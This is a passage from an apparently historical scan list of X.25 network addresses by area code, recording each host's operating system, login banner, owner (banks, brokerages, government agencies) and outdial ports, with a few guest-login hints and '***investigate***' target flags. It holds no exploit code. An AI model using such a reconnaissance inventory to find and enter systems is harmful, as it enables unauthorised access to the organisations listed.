  6028. 201 1359 $             Finlay Fine Jewelry Corp.
  6029. 201 1370.1 $ HP-3000   CORPHP.CIS.HCC                           
  6030. 201 1371 *
  6031. 201 1372 *
  6032. 201 1373 *
  6033. 201 1374 *
  6034. 201 1375 *
  6035. 201 1376 *
  6036. 201 1377 *
  6037. 201 1378 *
  6038. 201 1379 $
  6039. 201 1430 *             (incoming call barred) 
  6040. 201 1431 *             (incoming call barred)
  6041. 201 1432 *             (incoming call barred)
  6042. 201 1433 *             (incoming call barred)
  6043. 201 1434 *             (incoming call barred)
  6044. 201 1435 *             (incoming call barred)
  6045. 201 1442 *
  6046. 201 1443 *
  6047. 201 1446 *
  6048. 201 1454 *
  6049. 201 1455 *
  6050. 201 1456 *
  6051. 201 1460 
  6052. 201 1510 
  6053. 201 2030               Lynx Technologies Inc.
  6054. 201 2031   VTAM        Shearson Lehman Brothers NPSI  
  6055. 201 11234  VAX/VMS  
  6056.  
  6057.  
  6058.  
  6059. 202  -  Washington D.C.  Scanned: [0 - 3000] & various
  6060.  
  6061. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6062. ---------- ----------- -------------------------------------------------
  6063. 202 1      Prime
  6064. 202 2      Prime
  6065. 202 10     Prime
  6066. 202 12     Prime
  6067. 202 31                 NewsMachine 5.1                        
  6068. 202 36   $             NETWORK SIGN-ON FAILED     
  6069. 202 38   $             NETWORK SIGN-ON FAILED
  6070. 202 42   *
  6071. 202 48   $             U.S.I.A. Computer Center.  
  6072. 202 49                 enter system id -- 
  6073. 202 115  $             outdial (202)      
  6074. 202 116  $             outdial (202)
  6075. 202 117  $             outdial (202)
  6076. 202 123  $             xxxx 
  6077. 202 138  $ VAX/VMS     Gaullaudet University
  6078. 202 141 >909 761       User name?
  6079. 202 142 >909 406       User name?  
  6080. 202 149  $
  6081. 202 150                UPI>
  6082. 202 152  *
  6083. 202 201                CompuServe  User ID: phones
  6084. 202 202                CompuServe
  6085. 202 203                CompuServe
  6086. 202 224  $             outdial (global)
  6087. 202 235  $ Prime
  6088. 202 239  $ Prime
  6089. 202 241  *
  6090. 202 243  *
  6091. 202 245    AOS         Username: 
  6092. 202 253  *
  6093. 202 255                Morgan Stanley Network
  6094. 202 260  $             PLEASE SELECT: TSOMVS, ANOTHER APPLICATION
  6095. 202 265  $             USER ID
  6096. 202 266  $             USER ID
  6097. 202 275  *
  6098. 202 276  *
  6099. 202 277  *
  6100. 202 278  $             USER ID
  6101. 202 330  *
  6102. 202 331  *
  6103. 202 332  *
  6104. 202 333  *
  6105. 202 334  *
  6106. 202 335  *
  6107. 202 336    VAX/VMS     Congressional Quarterly Online Systems
  6108. 202 337    VAX/VMS     Congressional Quarterly Online Systems
  6109. 202 353  *
  6110. 202 356    PRIME       PRIMENET 22.1.1.R36 SYSA  
  6111. 202 361  *
  6112. 202 362  *
  6113. 202 363  *
  6114. 202 364  *
  6115. 202 365                Lexis and Nexis
  6116. 202 366                Lexis and Nexis
  6117. 202 367                Lexis and Nexis
  6118. 202 371  *
  6119. 202 372  *
  6120. 202 373  *
  6121. 202 377  *
  6122. 202 390  $             #CONNECT REQUESTED TO HOST GSAHOST : CANDE
  6123. 202 391  $             #CONNECT REQUESTED TO HOST GSAHOST : CANDE
  6124. 202 403  $             outdial (202) 
  6125. 202 433  *
  6126. 202 453                USER ID
  6127. 202 454    VAX/VMS     Connect to GBS     
  6128. 202 455  *
  6129. 202 456  *
  6130. 202 458  *
  6131. 202 459  *
  6132. 202 465  *
  6133. 202 466  *
  6134. 202 467  *
  6135. 202 468  *
  6136. 202 469  *
  6137. 202 472  *
  6138. 202 477                UPI>
  6139. 202 478                UPI>
  6140. 202 479                UPI>
  6141. 202 550                UPI>
  6142. 202 616  *
  6143. 202 617  *
  6144. 202 1030 *
  6145. 202 1031 *
  6146. 202 1032 *
  6147. 202 1033 *
  6148. 202 1034 *
  6149. 202 1155 *
  6150. 202 1156 *
  6151. 202 1157 *
  6152. 202 1158 *
  6153. 202 1159 *
  6154. 202 1261 *
  6155. 202 1262 *
  6156. 202 1263 *
  6157. 202 1264 *
  6158. 202 1265 *
  6159. 202 1266 *
  6160. 202 1267 *
  6161. 202 1268 *
  6162. 202 1269 *
  6163. 202 1270 *
  6164. 202 1323 $
  6165. 202 1325   VAX/VMS
  6166. 202 1363               Enter your User Name:
  6167. 202 1364.1 Unix        System name: fmis             
  6168. 202 1365.3 Unix/SysV   X.29 Terminal Service (person)
  6169. 202 1385   Prime       PRIMENET 22.1.3 CGYARD
  6170. 202 1407   Unix/SysV   X.29 Terminal Service (person)
  6171. 202 1440   VAX/VMS     Username:
  6172. 202 3011 *
  6173. 202 3012 *
  6174. 202 3030A              ASYNC TO 3270 -> FIRST AMERICAN BANK OF GEORGIA 
  6175. 202 3036 $ GS/1        GS/X.25 Gateway Server
  6176. 202 3060 *
  6177. 202 3067 $ Major BBS   Power Exchange (adult bbs and chat)  Member-ID? new
  6178. 202 3069 $             E06A26B3
  6179. 202 3070 $             
  6180. 202 3071 $
  6181. 202 3072 $
  6182. 202 3074 $ VAX/VMS     Welcome to VAX/VMS V5.5-1 
  6183. 202 3075 *
  6184. 202 3130               GTE Contel DUAT System       (login as visitor)
  6185. 202 3131               GTE Contel DUAT System       (airplane info galore)
  6186. 202 3134               USER ID 
  6187. 202 3135               USER ID 
  6188. 202 3138 *
  6189. 202 3139 *
  6190. 202 3140 *
  6191. 202 3142 *
  6192. 202 3145               &StArT&
  6193. 202 3242   VOS         Please login  (try 'help')
  6194. 202 3243   VOS         Please login
  6195. 202 3244   Unix        tmn!login:
  6196. 202 3246 *
  6197. 202 3247 *
  6198. 202 3254   VOS         Please login 
  6199. 202 3255   VOS         Please login 
  6200. 202 3256   VOS         Please login 
  6201. 202 3257               (locks up)
  6202. 202 3258   VOS         Please login
  6203. 202 3259   VOS         Please login
  6204. 202 3260   VOS         Please login
  6205. 202 3261   VOS         Please login 
  6206. 202 3262   VOS         Please login
  6207. 202 3263   VOS         Please login
  6208. 202 3264 $             AMS SYSTEM= 
  6209. 202 3269
  6210. 202 3330 *
  6211. 202 3332 *
  6212. 202 3333 *
  6213. 202 3335 $             NETX A000VD00 READY FOR LOGON
  6214. 202 3336 $             NETX A000VD00 READY FOR LOGON
  6215. 202 3337 *
  6216. 202 3338 *
  6217. 202 3600 *
  6218. 202 3601 *
  6219. 202 3602 *
  6220. 202 3603 *
  6221. 202 3604 *
  6222. 202 3605 *
  6223. 202 3606 *
  6224. 202 3611 *
  6225. 202 3612 *
  6226. 202 3613 *
  6227. 202 3614 *
  6228. 202 3630 *
  6229. 202 4220 
  6230. 202 4222
  6231. 202 4226               MSG10-RJRT TERMINAL-ID:GSSCXA63 IS NOW IN SESSION
  6232. 202 60031  VAX/VMS     V5.4-2  
  6233. 202 60033  Unix/SunOS  Welcome to QHDS!
  6234. 202 60035 *            
  6235. 202 60036              NETX A0A0VD00 READY FOR LOGON
  6236. 202 60039  Unix/SunOS  (QHDS.MXBC)
  6237. 202 60040              Lexis and Nexis
  6238. 202 60043 *
  6239. 202 60056
  6240. 202 60058 *
  6241. 202 60059 *
  6242. 202 60060 *
  6243. 202 60064 *
  6244. 202 60068              PIN: 
  6245. 202 60069              PIN:
  6246. 202 60070              PIN: 
  6247. 202 60071              PIN: 
  6248. 202 60073 *
  6249.  
  6250.  
  6251.  
  6252.  
  6253. 203  -  Connecticut  Scanned: [0 - 500]
  6254.  
  6255. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6256. ---------- ----------- -------------------------------------------------
  6257. 203 22     VM/CMS
  6258. 203 28     VM/CMS
  6259. 203 50                  CONNECTED TO PACKET/74
  6260. 203 60   $              GEN*NET Private Switched Data Network
  6261. 203 61   *
  6262. 203 62     VAX/VMS ACM  Enter SecurID PASSCODE: 
  6263. 203 66                  Login Please :
  6264. 203 67                  Login Please : 
  6265. 203 77   *
  6266. 203 78   $ Novell       Netware Access Server (DDS)
  6267. 203 79   *
  6268. 203 105  $              outdial (203)
  6269. 203 120  $              outdial (203)
  6270. 203 121  $              outdial (203)
  6271. 203 136    PRIME        PRIMENET 20.2.7 SYSA  
  6272. 203 159  $              access barred
  6273. 203 160  *
  6274. 203 161  $ Novell       Netware Access Server (INFOSYS)
  6275. 203 165                 Panoramic, Inc. PLEASE LOGON: help
  6276. 203 242                 Login Please : 
  6277. 203 274  $ ACF/VTAM      
  6278. 203 277  *              (incoming call barred)
  6279. 203 310
  6280. 203 317 
  6281. 203 346  *
  6282. 203 347                 SB > 
  6283. 203 350  *
  6284. 203 362  *              (incoming call barred)
  6285. 203 367                 CONNECTED TO PACKET/74
  6286. 203 434  $              (hangs up)
  6287. 203 435  $ ACF/VTAM
  6288. 203 438  $              (echo)
  6289. 203 442  $              (echo)
  6290. 203 452  *
  6291. 203 455 
  6292. 203 458  *              (incoming call barred)
  6293. 203 463  *
  6294. 203 465  *
  6295.  
  6296.  
  6297.  
  6298.  
  6299. 205  -  Alabama  Scanned: 0 - 300     
  6300.  
  6301. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6302. ---------- ----------- -------------------------------------------------
  6303. 205 237  *
  6304. 205 245  *
  6305. 205 246  *
  6306.  
  6307.  
  6308.  
  6309.  
  6310. 206  -  Washington  Scanned: [0 - 500]
  6311.  
  6312. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6313. ---------- ----------- -------------------------------------------------
  6314. 206 40   $ Prime       PRIMENET 23.2.0.r26 P6450 
  6315. 206 60   *
  6316. 206 65     PRIME       PRIMENET 22.1.4 OAD   
  6317. 206 66 
  6318. 206 67   $ 
  6319. 206 138  $             MHP201A UPK0BY60  * VERSION 5.5.4 *. 
  6320. 206 139  $             Wang VS Logon 
  6321. 206 154  $ DTC         THE SEATTLE DTC (DTC01.MACON.USOPM)
  6322. 206 158    VAX/VMS     Username:        
  6323. 206 167  *             (incoming call barred)
  6324. 206 170  $ hp-3000
  6325. 206 173  $             Renex Connect, SN-00100201
  6326. 206 205  $             outdial (206)
  6327. 206 206  $             outdial (206)
  6328. 206 208  $             outdial (206)
  6329. 206 239.1$             + Log on please
  6330. 206 240.1$             ***investigate***
  6331. 206 250  $             logins to this workstation temp. barred
  6332. 206 251  $ Wang        SYSTEM TWO (TACOMA:TACOMA)
  6333. 206 351  *
  6334. 206 352  *
  6335. 206 357  $ HP-3000
  6336. 206 360                CUSTOMER ID: 
  6337. 206 368  *
  6338. 206 369  *
  6339. 206 371  $
  6340. 206 375    Prime       PRIMENET 23.2.0.r26 DZ-BLV
  6341. 206 430  $             911 Monitor HATSLNCT is currently not available
  6342. 206 470    VAX/VMS
  6343. 206 479  $             + Log on please
  6344.  
  6345.  
  6346.  
  6347.  
  6348. 207  -  Maine  Scanned: 0 - 300      
  6349.  
  6350. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6351. ---------- ----------- -------------------------------------------------
  6352. 207 40   *
  6353. 207 260    ???         Please login:
  6354.  
  6355.  
  6356.  
  6357.  
  6358. 208  -  Idaho  Scanned: 0 - 300      
  6359.  
  6360. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6361. ---------- ----------- -------------------------------------------------
  6362. 208 236  *
  6363. 208 250  $             USER ID
  6364. 208 252                Welcome to the NET, X.29 Password: 
  6365.  
  6366.  
  6367.  
  6368.  
  6369. 209  -  California  Scanned: 0 - 300      
  6370.  
  6371. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6372. ---------- ----------- -------------------------------------------------
  6373. 209 241  *
  6374. 209 243  *
  6375. 209 245  *
  6376. 209 246  *
  6377. 209 270  $ VAX/VMS     Continental PET Technologies, MODESTO  
  6378. 209 273    DACS III    ***investigate***
  6379.  
  6380.  
  6381.  
  6382.  
  6383. 211  -  Dun & Broadstreet  Scanned: various
  6384.  
  6385. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6386. ---------- ----------- -------------------------------------------------
  6387. 211 1140               D&B terminal
  6388. 211 1142               D&B terminal
  6389. 211 1145   VAX/VMS     on VBH302
  6390. 211 1240               Please enter your terminal id; '?' for MENU
  6391. 211 1242               D&B terminal
  6392. 211 1244               Please enter your terminal id; '?' for MENU
  6393. 211 1245   ???         GNETMAIL                  
  6394. 211 2150   Prime       
  6395. 211 2240               DunsNet's User Verification Service 
  6396. 211 2247               DUNSCENTER  (connects to many machines)
  6397. 211 2249               ID?> 
  6398. 211 2255               ID?> 
  6399. 211 2450   Prime       
  6400. 211 2451   Prime
  6401. 211 3290   CMS?        IDC/370 Ready-
  6402. 211 3291   CMS?        IDC/370 Ready-
  6403. 211 3292   CMS?        IDC/370 Ready-
  6404. 211 3390   CMS?        IDC/370 Ready-
  6405. 211 3391   CMS?        IDC/370 Ready-
  6406. 211 3392   CMS?        IDC/370 Ready-
  6407. 211 3490   CMS?        IDC/370 Ready-
  6408. 211 4190               DunsNet's User Verification Service 
  6409. 211 4240               Enter service code -     
  6410. 211 4241               Enter service code -   
  6411. 211 5140   DTC         Nielsen Household Services (DTC03.NY.NPD)
  6412. 211 5240   VAX/VMS     GUMBY...
  6413. 211 5290   DTC         Nielsen Household Services (DTC02.NY.NPD)
  6414. 211 6140               PLEASE ENTER SUBSCRIBERID;PASSWORD
  6415. 211 6141               A. C. Nielsen Information Center.
  6416. 211 6142               A. C. Nielsen Information Center.
  6417. 211 6145
  6418. 211 6190               PLEASE ENTER SUBSCRIBERID;PASSWORD
  6419. 211 6240               A. C. Nielsen Information Center.
  6420. 211 6250   ???         USERNAME? 
  6421. 211 6290               PLEASE ENTER SUBSCRIBERID;PASSWORD
  6422. 211 8140               DIALOG INFORMATION SERVICES
  6423. 211 8142   VAX/VMS     Username:
  6424. 211 11140  VM/CMS      VM/370 ONLINE--        
  6425. 211 11142  VM/CMS      VM/370 ONLINE--        
  6426. 211 11144  VAX/VMS     Username:
  6427. 211 13190              D&B terminal (in spanish)
  6428. 211 13191              D&B terminal
  6429. 211 14110              Renex Connect, Enter password -     
  6430. 211 15140              NEODATA SERVICES NETWORK
  6431.  
  6432.  
  6433.  
  6434.  
  6435. 212  -  New York  Scanned: [0 - 3000] & various      
  6436.  
  6437. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6438. ---------- ----------- -------------------------------------------------
  6439. 212 30                 ENTER ID:
  6440. 212 31   $ VM/CMS             
  6441. 212 34   *             
  6442. 212 40                 PLEASE ENTER /LOGIN
  6443. 212 41                 MHP201A UPK05173  APPLICATION: 
  6444. 212 48   *             
  6445. 212 52   $ Prime
  6446. 212 53     VAX/VMS             
  6447. 212 73   $ Prime            
  6448. 212 79                 ENTER ID:
  6449. 212 100    VAX/VMS     Username:
  6450. 212 101    VAX/VMS     Username: 
  6451. 212 102                **** Invalid sign-on, please try again **** 
  6452. 212 103    VAX/VMS     Username: 
  6453. 212 104                **** Invalid sign-on, please try again ****
  6454. 212 105                **** Invalid sign-on, please try again ****
  6455. 212 106                **** Invalid sign-on, please try again ****
  6456. 212 108                **** Invalid sign-on, please try again ****
  6457. 212 109                **** Invalid sign-on, please try again ****
  6458. 212 110                **** Invalid sign-on, please try again ****
  6459. 212 112                Shearson Lehman Brothers
  6460. 212 124  $ VAX/VMS     Username:       
  6461. 212 130                you are now connected to the host computer 
  6462. 212 131                Shearson Lehman Brothers
  6463. 212 137    Prime       PRIMENET 22.1.1.R17.STS.6 NY60  
  6464. 212 145                ENTER ACCESS ID: 
  6465. 212 146                ENTER ACCESS ID: 
  6466. 212 152    VAX/VMS     Username: 
  6467. 212 170  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK
  6468. 212 172  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK  
  6469. 212 174  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK  
  6470. 212 197                BANKERS TRUST 
  6471. 212 202    VAX/VMS     Username:
  6472. 212 226                USER ID   ?
  6473. 212 231  $ VM/CMS            
  6474. 212 242                ENTER IDENTIFICATION: 
  6475. 212 255    VAX/VMS     (PB2 - PBS Development System)
  6476. 212 259    VAX/VMS     (NYTASD - TAS SYSTEM) 
  6477. 212 260                Bankers Trust Online 
  6478. 212 274  $             INVALID INPUT      
  6479. 212 275                Bankers Trust Online
  6480. 212 276  *             
  6481. 212 277                ****POSSIBLE DATA LOSS 00 00****
  6482. 212 278                Bankers Trust Online
  6483. 212 279                User:          (RSTS V9.3-20) 
  6484. 212 285                Invalid login attempt
  6485. 212 306  *             
  6486. 212 315  $             outdial (212)            
  6487. 212 320                ENTER IDENTIFICATION:
  6488. 212 321                ENTER IDENTIFICATION: 
  6489. 212 322  $             COMMAND UNRECOGNIZED             
  6490. 212 336  *
  6491. 212 344  *             
  6492. 212 345    Prime       PRIMENET 23.2.0.R32 NMSG  
  6493. 212 352  *             
  6494. 212 359                (drops connection right away)
  6495. 212 376 -> 201 950     Bankers Trust Online
  6496. 212 430 -> 312 59      Id Please:     User Id:     Password:
  6497. 212 432  *             
  6498. 212 437  *             
  6499. 212 438  *             
  6500. 212 440  *             
  6501. 212 444    Prime       PRIMENET 21.0.7.R31 EMCO  
  6502. 212 446  $ VAX/VMS            
  6503. 212 449  $ VM/CMS             
  6504. 212 500                enter a for astra 
  6505. 212 501                enter a for astra
  6506. 212 502                enter a for astra 
  6507. 212 503                enter a for astra 
  6508. 212 504                enter a for astra 
  6509. 212 505                enter a for astra
  6510. 212 509  $             Transamerican Leasing (White Plains Data Center)      
  6511. 212 539                (drops connections right away)
  6512. 212 546  $             APLICACAO:
  6513. 212 549  $             BT-Tymnet Gateway
  6514. 212 561    VAX/VMS     Username:
  6515. 212 571                You are not authorized to connect to this machine.
  6516. 212 572  $             No access to this DTE.
  6517. 212 580                enter a for astra 
  6518. 212 603                Shearson Lehman Brothers
  6519. 212 615                Shearson Lehman Brothers
  6520. 212 623                Shearson Lehman Brothers
  6521. 212 693  $             USER ID   
  6522. 212 703    Unix        
  6523. 212 704    Unix
  6524. 212 713    Prime       PRIMENET 22.1.1.R17.STS.6 NY60  
  6525. 212 726  $ VAX/VMS
  6526. 212 731 
  6527. 212 970  *
  6528. 212 971  *
  6529. 212 972  *
  6530. 212 973  *
  6531. 212 974  *
  6532. 212 975  *
  6533. 212 976  *
  6534. 212 977  *
  6535. 212 978  *
  6536. 212 979  *
  6537. 212 1000 $             Enter ID:
  6538. 212 1001 $             Enter ID:
  6539. 212 1002 $             Enter ID:
  6540. 212 1004 $             Enter ID:
  6541. 212 1009 $             outdial (212)
  6542. 212 1045 $ HP-3000     White & Case - HP 3000 Computer System 
  6543. 212 1046 *
  6544. 212 1049               APPLICATION: 
  6545. 212 1050               NSP READY?
  6546. 212 1052   Prime       PRIMENET 20.2.4.R11 FTC0  
  6547. 212 1053   VAX/VMS     
  6548. 212 1065 $ AOS         Track Data System 12 
  6549. 212 1069               #
  6550. 212 1071 $ GS/1        CS/100T>
  6551. 212 1072 $ GS/1        CS/100T>
  6552. 212 1076               NSP READY
  6553. 212 1233 *
  6554. 212 1355 *
  6555. 212 1356 *
  6556. 212 1367               You are not authorized to connect to this machine.
  6557. 212 1373               enter a for astra 
  6558. 212 1450               RadioSuisse Services. 
  6559. 212 1469
  6560. 212 1477               n042ppp> enter system id
  6561. 212 1478               n042ppp> enter system id
  6562. 212 2050B  Unix        softdollar login: 
  6563. 212 2050D  Unix        softdollar login: 
  6564. 212 2060 $             T.S.S.G
  6565. 212 2061 $             Boston Safe Deposit and Trust Company
  6566. 212 2062 $             TWX40 LOGGED INTO AN INFORMATION SERVICES NETWORK   
  6567. 212 2071   VM/CMS      GSERV
  6568. 212 2079   VM/CMS      GSERV
  6569. 212 2130 $             (echo)
  6570. 212 2131 $             (echo)
  6571. 212 2134 $             (echo)
  6572. 212 2135 $             (echo)
  6573. 212 2230 $             (echo)
  6574. 212 2231 $             (echo)
  6575. 212 2234 $             (echo)
  6576. 212 2235 $             (echo)
  6577. 212 2245 $             Finlay Fine Jewelry Corp.
  6578. 212 2250   VAX/VMS     Username: 
  6579. 212 2251               **** Invalid sign-on, please try again ****
  6580. 212 2252               **** Invalid sign-on, please try again ****
  6581. 212 2253               **** Invalid sign-on, please try again ****
  6582. 212 2254               **** Invalid sign-on, please try again ****
  6583. 212 2270               **** Invalid sign-on, please try again ****
  6584. 212 2271               **** Invalid sign-on, please try again ****
  6585. 212 2272               **** Invalid sign-on, please try again ****
  6586. 212 2273               **** Invalid sign-on, please try again ****
  6587. 212 2274               **** Invalid sign-on, please try again ****
  6588. 212 60002              You are not authorized to connect to this machine.
  6589. 212 60007              You are not authorized to connect to this machine.
  6590. 212 60010              You are not authorized to connect to this machine.
  6591. 212 60031  VM/CMS
  6592. 212 60032              ENTER ID:
  6593. 212 60033  Prime       CDA Online Services 
  6594. 212 60034              CHANNEL 03/009. ENTER RESOURCE 
  6595. 212 60037  VAX/VMS     MuniView
  6596. 212 60044 *
  6597. 212 60051 *
  6598. 212 60055              USER ID
  6599.  
  6600.  
  6601.  
  6602.  
  6603. 213  -  California  Scanned: [0 - 2000]     
  6604.  
  6605. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6606. ---------- ----------- -------------------------------------------------
  6607. 213 21     Prime       PRIMENET 23.2.0.R32 C6    
  6608. 213 22     Prime       PRIMENET 23.2.0.R32 D6    
  6609. 213 23   $             outdial (213)
  6610. 213 24                 Marketron Research and Sales System
  6611. 213 25   $             outdial (213)
  6612. 213 35                 Marketron Research and Sales System
  6613. 213 41   $             (echo)
  6614. 213 45   $             ENTER NETWORK SIGN-ON:
  6615. 213 50   $             (echo)
  6616. 213 52   $ Prime
  6617. 213 53                 CONNECTED TO PACKET/74
  6618. 213 55                 CONNECTED TO PACKET/74
  6619. 213 56                 CONNECTED TO PACKET/74
  6620. 213 60                 CONNECTED TO PACKET/74
  6621. 213 61                 CONNECTED TO PACKET/74
  6622. 213 68   *
  6623. 213 70   *
  6624. 213 102    Prime       PRIMENET 21.0.7.R10 TRWE.A
  6625. 213 103  $             outdial (213)
  6626. 213 105    Prime       PRIMENET 22.1.3.beta1 SWOP  
  6627. 213 121    Prime       PRIMENET 23.0.0 SWWE1 
  6628. 213 122    Unix        Computervision Los Angeles District Admin System 
  6629. 213 123    Prime       PRIMENET 23.3.0.r29 SWWA1 
  6630. 213 129    Prime       PRIMENET 22.0.3vA CALMA1
  6631. 213 151    Prime       PRIMENET 22.1.3 CSSWR1
  6632. 213 154    Prime       PRIMENET 22.1.1.R27 SWWCR 
  6633. 213 155    Prime       PRIMENET 22.1.3 CS.LA 
  6634. 213 199    Prime       PRIMENET 23.2.0.R32 C6    
  6635. 213 220A               TELENET ASYNC TO 3270 SERVICE 
  6636. 213 221A               TELENET ASYNC TO 3270 SERVICE 
  6637. 213 248  *
  6638. 213 249  *
  6639. 213 262  *
  6640. 213 265  *
  6641. 213 340    Prime       PRIMENET 23.2.0 TRNGW 
  6642. 213 336  *
  6643. 213 337  $ HP-3000
  6644. 213 351    Unix/SunOS  SunOS Release 4.1.2 (X25) 
  6645. 213 357    Unix/SunOS  SunOS Release 4.1.1 (X25) 
  6646. 213 359    Unix
  6647. 213 371  *
  6648. 213 373    HP-3000     SAGAN.HP.COM
  6649. 213 412  $             outdial (213)
  6650. 213 413  $             outdial (213)
  6651. 213 540  *
  6652. 213 541  *
  6653. 213 542  *
  6654. 213 543  *
  6655. 213 660 
  6656. 213 1052 $             Environment Control Monitor
  6657. 213 1053 $ Unix        milpitas login: 
  6658. 213 1054 *
  6659. 213 1055 $             Environment Control Monitor
  6660. 213 1056 *
  6661. 213 1057 $             Denver Service System (ECM)
  6662. 213 1064 *
  6663. 213 1065   HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
  6664. 213 1073
  6665. 213 1079 *
  6666. 213 1160 *
  6667. 213 1418 *
  6668. 213 1419 *
  6669. 213 1420 *
  6670. 213 1421 *
  6671. 213 1422 *
  6672. 213 1423 *
  6673. 213 1424 *
  6674. 213 1425 *
  6675. 213 1426 *
  6676. 213 1427 *
  6677. 213 1428 *
  6678. 213 1429 *
  6679. 213 1430 *
  6680. 213 1450               MACNET:
  6681.  
  6682.  
  6683.  
  6684.  
  6685. 214  -  Texas  Scanned: [0 - 2000]     
  6686.  
  6687. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6688. ---------- ----------- -------------------------------------------------
  6689. 214 20                 SIM3278
  6690. 214 21                 SIM3278
  6691. 214 22   $             outdial (214)
  6692. 214 42     VAX/VMS     Username:
  6693. 214 60     HP-3000     DELTA.RCO.NTI
  6694. 214 68   $ VAX/VMS     GTECVC
  6695. 214 76     Cyber       Power Computing Cyber Service
  6696. 214 231
  6697. 214 240
  6698. 214 245  *
  6699. 214 337 
  6700. 214 352                IST451I ENTER VALID COMMAND - NETX B0A8VD00
  6701. 214 355  *
  6702. 214 358  *
  6703. 214 364  $ VAX/VMS     GTECVC 
  6704. 214 366                Renex Connect, Enter service code -    
  6705. 214 371    Prime       PRIMENET 21.0.2S GCAD..
  6706. 214 372
  6707. 214 373  *
  6708. 214 1031 *
  6709. 214 1032 *
  6710. 214 1033 *
  6711. 214 1034 $             (echo)
  6712. 214 1035 *
  6713. 214 1040 $             (echo)
  6714. 214 1048               Renex Connect, Enter terminal type or "M" for menu 
  6715. 214 1070               BT-Tymnet Gateway  please log in: information
  6716. 214 1071   Cyber       You may enter CDCNET commands.
  6717. 214 1075   Cyber       You may enter CDCNET commands.
  6718. 214 1131 *
  6719. 214 1151   VAX/VMS     Username:
  6720. 214 1152 *
  6721. 214 1153
  6722. 214 1158 *
  6723. 214 1161   VAX/VMS     Username:
  6724. 214 1230 *
  6725. 214 1237
  6726. 214 1238 
  6727. 214 1241 *
  6728. 214 1242 *
  6729. 214 1243 *
  6730. 214 1244 *
  6731. 214 1245 *
  6732. 214 1246 *
  6733. 214 1247 *
  6734. 214 1248 *
  6735. 214 1249 *
  6736. 214 1250 *
  6737. 214 1251 *
  6738. 214 1252 *
  6739. 214 1253 *
  6740. 214 1254 *
  6741. 214 1255 *
  6742. 214 1256 *
  6743. 214 1257 *
  6744. 214 1258 *
  6745. 214 1260 *
  6746. 214 1261 *
  6747. 214 1262 *
  6748. 214 1263 *
  6749. 214 1264 *
  6750. 214 1265   VAX/VMS     Username:
  6751. 214 1277 *
  6752. 214 1278 *
  6753. 214 1334 *
  6754. 214 1335 *
  6755. 214 1336 *
  6756. 214 1337 *
  6757. 214 1338 *
  6758. 214 1339 *
  6759. 214 1340 *
  6760. 214 1341 *
  6761. 214 1343 *
  6762. 214 1358 *
  6763. 214 1359 *
  6764. 214 1362   VAX/VMS     Username:
  6765. 214 1363 *
  6766. 214 1364 *
  6767. 214 1365 *
  6768. 214 1366 *
  6769.  
  6770.  
  6771.  
  6772.  
  6773. 215  -  Pennsylvania  Scanned: 0 - 300     
  6774.  
  6775. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6776. ---------- ----------- -------------------------------------------------
  6777. 215 5    $             outdial (215)
  6778. 215 22   $             outdial (215)
  6779. 215 30   *
  6780. 215 38   *
  6781. 215 40                 VU/TEXT 
  6782. 215 44   *
  6783. 215 55   *
  6784. 215 60   *
  6785. 215 66     Prime       NewsNet
  6786. 215 112  $             outdial (215)
  6787. 215 121    VM/CMS      TOWERS PERRIN ONLINE--PHILA 
  6788. 215 134  *
  6789. 215 135                VU/TEXT 
  6790. 215 139  *
  6791. 215 140                VU/TEXT 
  6792. 215 143  *
  6793. 215 154 
  6794. 215 163    Unix
  6795. 215 164    Unix
  6796. 215 165    Unix
  6797. 215 166    Unix
  6798. 215 167    Unix
  6799. 215 168    Unix
  6800. 215 169    Unix
  6801. 215 170    Unix
  6802. 215 171    Unix
  6803. 215 172  *
  6804. 215 173  *
  6805. 215 176  *
  6806. 215 179    Unix        PLASPEC Engineering & Marketing Network
  6807. 215 231 
  6808. 215 251    Unix
  6809. 215 252    Unix
  6810. 215 253    Unix
  6811. 215 254    Unix
  6812. 215 255    Unix
  6813. 215 261    VAX/VMS     File Transfer and Gateway Service Node ARGO
  6814. 215 262 
  6815. 215 263
  6816. 215 263 
  6817. 215 264                %@CVTTAUD@dUYECVGUIiED
  6818. 215 270                CONNECTED TO PACKET/400
  6819. 215 530  $
  6820. 215 531  $
  6821. 215 532  $
  6822. 215 533  $
  6823. 215 534  $
  6824. 215 535  $
  6825. 215 536  $
  6826. 215 537  $
  6827. 215 538  $
  6828. 215 539  $
  6829. 215 540  $
  6830. 215 541  $
  6831.  
  6832.  
  6833.  
  6834.  
  6835. 216  -  Ohio  Scanned: [0 - 2000]     
  6836.  
  6837. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6838. ---------- ----------- -------------------------------------------------
  6839. 216 20   $             outdial (216)
  6840. 216 21   $             outdial (216)
  6841. 216 38     VAX/VMS     Username:
  6842. 216 49 
  6843. 216 51   *
  6844. 216 59   *             
  6845. 216 60                 APPLICATION: 
  6846. 216 63   *
  6847. 216 64     Prime       PRIMENET 20.2.4 LIPC  
  6848. 216 74   $ hp-x000
  6849. 216 75   *
  6850. 216 120  $             outdial (216)
  6851. 216 134  *
  6852. 216 135  *
  6853. 216 140 
  6854. 216 201  $ HP-3000
  6855. 216 202  *
  6856. 216 203  *
  6857. 216 204  *
  6858. 216 205  *
